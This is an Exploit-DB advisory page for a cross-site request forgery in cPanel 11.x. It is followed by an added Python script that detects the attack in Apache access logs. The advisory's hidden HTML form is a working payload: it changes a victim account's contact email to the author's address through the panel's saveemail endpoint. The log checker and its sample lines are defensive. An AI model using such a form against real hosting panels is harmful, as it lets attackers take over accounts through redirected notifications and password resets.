Cpanel 11.x - Edit E-mail Cross-Site Request Forgery Exploit

2010-11-21T00:00:00
ID EDB-ID:15593
Type exploitdb
Reporter Mon7rF
Modified 2010-11-21T00:00:00

Description

Cpanel 11.x - Edit E-mail Cross-Site Request Forgery Exploit. Webapps exploit for php platform

                                        
# Exploit Title: Cpanel 11.X Edit E-mail  Cross Site Request Forgery exploit
# Date: 22 - 10 - 2010
# Author: Mon7rF
# Mail : X0h@msn.com
# Tested on: Windows 7

--------------------------------------------------------------------------------------

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"  
action="http://www.site.com:2082/frontend/x3/contact/saveemail.html">

<input id="email"                    name="email"                    type="hidden" value="X0h@msn.com">
<input id="second_email"             name="second_email"             type="hidden" value="">
<input id="notify_disk_limit"        name="notify_disk_limit"        type="hidden" value="1">
<input id="notify_bandwidth_limit"   name="notify_bandwidth_limit"   type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">

<input type="submit" class="input-button" value="Save">

</form>

--------------------------------------------------------------------------------------

Gr33ts : RENO - Mr.M3x - all Member p0c Team ..
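
Added example, not part of the original advisory and not cPanel code: a log check for the request the form above produces. The form has no method attribute, so a browser submits it as GET and the new contact address lands in the query string. Assumptions: the access log uses the Apache "combined" layout, and the host names and log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint path and "email" field name come from the proof-of-concept form above.
ENDPOINT = "/frontend/x3/contact/saveemail.html"

# Assumption: access log lines follow the Apache "combined" layout.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (hosts, users and addresses are placeholders).
SAMPLE_LOG = [
    '203.0.113.7 - alice [21/Nov/2010:10:02:11 +0000] "GET /frontend/x3/contact/saveemail.html?email=owner%40example.com&second_email=&notify_disk_limit=1 HTTP/1.1" 200 512 "http://panel.example.com:2082/frontend/x3/contact/index.html" "Mozilla/5.0"',
    '203.0.113.7 - alice [21/Nov/2010:10:05:40 +0000] "GET /frontend/x3/contact/saveemail.html?email=someone%40example.net&second_email=&notify_disk_limit=1 HTTP/1.1" 200 512 "http://forum.example.org/thread/42" "Mozilla/5.0"',
    '203.0.113.7 - alice [21/Nov/2010:10:06:02 +0000] "GET /frontend/x3/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def referer_is_foreign(referer, panel_hosts):
    """True when the Referer is missing or names a host other than the panel."""
    if referer in ("", "-"):
        return True
    host = urlsplit(referer).hostname
    return host is None or host.lower() not in panel_hosts

def suspicious_saves(lines, panel_hosts):
    """Return contact-email changes that were not submitted from the panel's own pages."""
    panel_hosts = {h.lower() for h in panel_hosts}
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        if url.path != ENDPOINT or not referer_is_foreign(m["referer"], panel_hosts):
            continue
        # For GET submissions the new address is visible in the query string.
        email = parse_qs(url.query).get("email", [""])[0]
        hits.append({"ts": m["ts"], "user": m["user"], "ip": m["ip"],
                     "method": m["method"], "referer": m["referer"],
                     "new_email": email})
    return hits

if __name__ == "__main__":
    for hit in suspicious_saves(SAMPLE_LOG, {"panel.example.com"}):
        print(hit)
```

A hit with a missing Referer is weaker evidence than one naming a third-party site, so review it alongside the account's later password-reset activity.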